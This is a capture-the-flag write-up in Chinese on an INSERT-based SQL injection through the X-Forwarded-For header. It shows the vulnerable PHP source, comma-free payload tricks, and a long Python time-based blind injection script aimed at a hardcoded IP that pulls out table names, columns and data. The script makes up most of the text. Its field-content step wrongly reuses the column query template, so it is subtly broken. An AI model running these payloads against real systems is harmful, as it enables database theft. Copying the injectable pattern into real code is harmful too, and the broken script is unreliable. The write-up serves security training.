INSERT INTO 注入
给了源码
error_reporting(0);
function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
代码逻辑很清晰,把传入的HTTP_X_FORWARDED_FOR的值插入到数据库里
HTTP_X_FORWARDED_FOR通过X-Forwarded-For来传入
但这里需要注意,插入的只是HTTP_X_FORWARDED_FOR里第一个逗号前的部分,所以不能使用逗号
- 使用
select case when x then x else x end语句来代替if(x,x,x) - 使用
from a for b语句来代替limit a,b
验证语句x-forwarded-For: 1.1.1.1'+(select case when(1) then sleep(4) else 1 end) + '1
然后写脚本爆破就可以了
这个脚本比较全但是很笨重,缺少对错误的处理,实际用的时候有很多地方也是不必要的,可以根据需求自行修改
ps:直接跑基本跑不出来,建议根据思想自己动手写/修改
"""
Title: SQLi_Time
Author: Recol
Date: 2020-04-01
"""
import requests
url = 'http://123.206.87.240:8002/web15/'
table_number_sql = "1.1.1.1'+(select case when((select length(table_name) from information_schema.tables where table_schema=database() limit 1 offset %d)>0)then sleep(4) else 1 end) + '1"
table_length_sql = "1.1.1.1'+(select case when((select length(table_name) from information_schema.tables where table_schema=database() limit 1 offset %d)=%d)then sleep(4) else 1 end) + '1"
table_name_sql = "1.1.1.1'+(select case when(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1 offset %d) from %d for 1))=%d)then sleep(4) else 1 end) + '1"
column_number_sql = "1.1.1.1'+(select case when((select length(column_name) from information_schema.columns where table_name='%s' limit 1 offset %d)>0)then sleep(4) else 1 end) + '1"
column_length_sql = "1.1.1.1'+(select case when((select length(column_name) from information_schema.columns where table_name='%s' limit 1 offset %d)=%d)then sleep(4) else 1 end) + '1"
column_name_sql = "1.1.1.1'+(select case when(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='%s' limit 1 offset %d) from %d for 1))=%d)then sleep(4) else 1 end) + '1"
field_number_sql = "1.1.1.1'+(select case when((select length(%s) from %s limit 1 offset %d)>0)then sleep(4) else 1 end) + '1"
field_length_sql = "1.1.1.1'+(select case when((select length(%s) from %s limit 1 offset %d)=%d)then sleep(4) else 1 end) + '1"
field_name_sql = "1.1.1.1'+(select case when(ascii(substr((select group_concat(%s) from %s limit 1 offset %d) from %d for 1))=%d)then sleep(4) else 1 end) + '1"
headers = {
'X-Forwarded-For': '',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.9 Safari/537.36'
}
def get_table_number():
for i in range(100):
sql = table_number_sql % i
header_ = headers
header_['X-Forwarded-For'] = sql
try:
res = requests.get(url=url, headers=header_, timeout=3)
except requests.exceptions.ReadTimeout:
continue
else:
print('table_number: ' + str(i + 1))
return i + 1
def get_table_length(x):
for i in range(100):
sql = table_length_sql % (x, i)
header_ = headers
header_['X-Forwarded-For'] = sql
try:
res = requests.get(url=url, headers=header_, timeout=3)
except requests.exceptions.ReadTimeout:
print('table_length: ' + str(i))
return i
def get_table_name(length, seq):
name = ''
for x in range(length + 1):
for i in range(30, 200):
sql = table_name_sql % (seq, x, i)
header_ = headers
header_['X-Forwarded-For'] = sql
try:
res = requests.get(url=url, headers=header_, timeout=3)
except requests.exceptions.ReadTimeout:
print(chr(i), end='')
name += chr(i)
return name
def get_column_number(table_name):
for i in range(100):
sql = column_number_sql % (table_name, i)
header_ = headers
header_['X-Forwarded-For'] = sql
try:
res = requests.get(url=url, headers=header_, timeout=3)
except requests.exceptions.ReadTimeout:
continue
else:
print('column_number: ' + str(i + 1))
return i + 1
def get_column_length(table_name, seq):
for i in range(100):
sql = column_length_sql % (table_name, seq, i)
header_ = headers
header_['X-Forwarded-For'] = sql
try:
res = requests.get(url=url, headers=header_, timeout=3)
except requests.exceptions.ReadTimeout:
print('column_length: ' + str(i))
return i
def get_column_name(length, table_name, seq):
name = ''
for x in range(length + 1):
for i in range(30, 200):
sql = column_name_sql % (table_name, seq, x, i)
header_ = headers
header_['X-Forwarded-For'] = sql
try:
res = requests.get(url=url, headers=header_, timeout=3)
except requests.exceptions.ReadTimeout:
print(chr(i), end='')
name += chr(i)
print(name)
return name
def get_field_numbers(table_name, column_name):
for i in range(100):
sql = field_number_sql % (column_name, table_name, i)
header_ = headers
header_['X-Forwarded-For'] = sql
try:
res = requests.get(url=url, headers=header_, timeout=3)
except requests.exceptions.ReadTimeout:
continue
else:
print('field_number: ' + str(i + 1))
return i + 1
def get_field_length(table_name, column_name, seq):
for i in range(100):
sql = field_length_sql % (column_name, table_name, seq, i)
header_ = headers
header_['X-Forwarded-For'] = sql
try:
res = requests.get(url=url, headers=header_, timeout=3)
except requests.exceptions.ReadTimeout:
print('field_length: ' + str(i))
return i
def get_field_content(column_name, table_name, seq, length):
name = ''
for x in range(length + 1):
for i in range(30, 200):
sql = column_name_sql % (column_name, table_name, seq, x, i)
header_ = headers
header_['X-Forwarded-For'] = sql
try:
res = requests.get(url=url, headers=header_, timeout=3)
except requests.exceptions.ReadTimeout:
print(chr(i), end='')
name += chr(i)
print(name)
return name
def start():
table_number = get_table_number()
res = {}
for i in range(table_number):
table_length = get_table_length(i)
table_name = get_table_name(table_length, i)
column_number = get_column_number(table_name)
res[table_name] = {}
for x in range(column_number):
column_length = get_column_length(table_name, x)
column_name = get_column_name(column_length, table_name, x)
res[table_name][column_name] = []
field_number = get_field_numbers(table_name, column_name)
for s in range(field_number):
field_length = get_field_length(table_name, column_name, s)
field_content = get_field_content(column_name, table_name, s, field_length)
res[table_name][column_name].append(field_content)
print(res)
start()